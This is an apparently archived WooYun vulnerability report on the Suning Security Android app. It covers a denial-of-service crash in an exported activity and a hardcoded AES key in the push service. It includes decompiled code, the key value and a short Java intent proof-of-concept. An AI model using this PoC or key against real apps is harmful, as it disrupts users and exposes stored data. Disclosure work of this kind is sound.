当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142647

漏洞标题:苏宁安全app拒绝服务一枚

相关厂商:江苏苏宁易购电子商务有限公司

漏洞作者: hh88

提交时间:2015-09-23 14:14

修复时间:2015-12-22 15:16

公开时间:2015-12-22 15:16

漏洞类型:拒绝服务

危害等级:低

自评Rank:3

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-23: 细节已通知厂商并且等待厂商处理中
2015-09-23: 厂商已经确认,细节仅向厂商公开
2015-09-26: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-11-17: 细节向核心白帽子及相关领域专家公开
2015-11-27: 细节向普通白帽子公开
2015-12-07: 细节向实习白帽子公开
2015-12-22: 细节向公众公开

简要描述:

Android苏宁安全是一款免费的手机安全软件,集手机防盗、防垃圾短信,防骚扰电话功能于一身,为您带来全方位。。。。。。。。

详细说明:

由于组件com.suning.phonesecurity.firewall.NameEditorActivity暴露

protected void onCreate(Bundle arg4) {
super.onCreate(arg4);
this.n = this.getIntent();
if(this.n.getData() == null) {
this.n.setData(ak.a);
}
this.m = this.n.getAction();
this.e = this.n.getStringExtra("blocktype");
if(this.e == null) {
a.a("NameEditor", "No block type, exiting");
this.finish();
return;
}
this.o = this.n.getStringExtra(this.e);
a.a("NameEditor", "mBlocktype:" + this.e);
ActionBar v0 = this.getActionBar();
if(v0 != null) {
v0.setDisplayOptions(12);
}
if(this.e.equals(NameEditorActivity.a[1])) {
goto label_50;
}
if(this.e.equals(NameEditorActivity.a[3])) {
goto label_50;
}
if(this.e.equals(NameEditorActivity.a[0])) {
goto label_83;
}
if(!this.e.equals(NameEditorActivity.a[2])) {
this.setContentView(2130968595);
this.d = this.findViewById(2131427471);
this.d.addTextChangedListener(this.q);
if(!TextUtils.isEmpty(this.o)) {
this.d.setText(this.o);
}
this.j = this.findViewById(2131427474);
this.k = this.findViewById(2131427472);
this.l = this.findViewById(2131427473);
}
else {
label_83: // R.layout.activity_number_editor
this.setContentView(2130968597);
this.d = this.findViewById(2131427479);
this.d.addTextChangedListener(this.q);
this.d.addTextChangedListener(new PhoneNumberFormattingTextWatcher());
goto label_58;
label_50: // R.layout.activity_patternnum_editor
this.setContentView(2130968599);
this.d = this.findViewById(2131427488);
this.d.addTextChangedListener(this.q);
}
label_58:
if(!"android.intent.action.INSERT".equals(this.m) && !"android.intent.action.EDIT".equals(this
.m)) {
a.a("NameEditor", "Unknown action, exiting");
this.finish();
return;
}
if(arg4 != null) {
this.f = arg4.getString("origContent");
this.g = Boolean.valueOf(arg4.getBoolean("origPattern"));
this.h = Boolean.valueOf(arg4.getBoolean("origCall"));
this.i = Boolean.valueOf(arg4.getBoolean("origSms"));
}
}
其中这三个转换 this.g = Boolean.valueOf(arg4.getBoolean("origPattern"));
this.h = Boolean.valueOf(arg4.getBoolean("origCall"));
this.i = Boolean.valueOf(arg4.getBoolean("origSms"));
传入异常数据,即可产生拒绝服务


另外

package com.suning.cloud.push.pushservice.b;
private b(Context arg7) {
Iterator v2_1;
super();
this.a = new ArrayList();
this.e = new HashMap();
this.d = arg7.getApplicationContext();
b.b(this.d);
String v1 = this.d.getSharedPreferences(String.valueOf(this.d.getPackageName()) + ".push_sync",
1).getString("content", "");
if(!TextUtils.isEmpty(((CharSequence)v1))) {
try {
byte[] v1_2 = Base64.decode(v1.getBytes(), 0);
SecretKeySpec v4 = new SecretKeySpec("9876543210123456".getBytes(), "AES");
Cipher v3 = Cipher.getInstance("AES");
v3.init(2, ((Key)v4));
String v2 = new String(v3.doFinal(v1_2));
if(h.f()) {
Log.i(b.b, "init : " + v2);
}
固定秘钥是很危险的。

漏洞证明:

Screenshot_2015-09-21-16-54-10.png

public static void NameEditorActivity_poc(Context context){
Intent intent=new Intent();
intent.setClassName("com.suning.phonesecurity", "com.suning.phonesecurity.firewall.NameEditorActivity");
intent.setAction("android.intent.action.INSERT");
intent.putExtra("blocktype", "whitelist");
intent.putExtra("whitelist", "xxoo");

intent.putExtra("origCall", "xxxx");
context.startActivity(intent);
}


修复方案:

加trycatch
就冲着 “感谢提交,移动客户端拒绝服务漏洞一律按照200元礼品卡计算”来的。

版权声明:转载请注明来源 hh88@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2015-09-23 15:14

厂商回复:

感谢提交,请将安全漏洞提交至http://

最新状态:

暂无